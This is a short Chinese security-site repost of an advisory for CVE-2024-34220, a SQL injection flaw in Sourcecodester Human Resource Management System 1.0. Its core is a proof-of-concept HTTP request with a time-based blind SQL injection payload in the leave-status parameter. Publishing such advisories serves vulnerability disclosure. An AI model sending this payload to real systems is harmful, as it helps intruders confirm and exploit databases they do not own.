CVE-2024-34220

admin 2024年5月18日12:19:23评论10 views字数 1129阅读3分45秒阅读模式

使使使

影响描述

    人力资源管理系统1.0易受通过“leave”参数进行SQL注入的攻击。Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the 'leave' parameter.

poc&exp

POST /hrm/user/applyleave.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 149Origin: http://localhostConnection: closeReferer: http://localhost/hrm/user/applyleave.phpCookie: PHPSESSID=2v2v2al4dkd4iir9cl5j7oikvrUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1X-PwnFox-Color: cyanleavestatus=5'+AND+(SELECT+1337+FROM+(SELECT(SLEEP(5)))VSgR)+AND+'Kha'%3d'123&reason=+++&startdate=03%2F04%2F2024&enddate=29%2F04%2F2024&Apply=Submit

CVE-2024-34220

CVE-2024-34220

原文始发于微信公众号(漏洞猎人):CVE-2024-34220

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月18日12:19:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-34220https://cn-sec.com/archives/2753667.html

发表评论

匿名网友 填写信息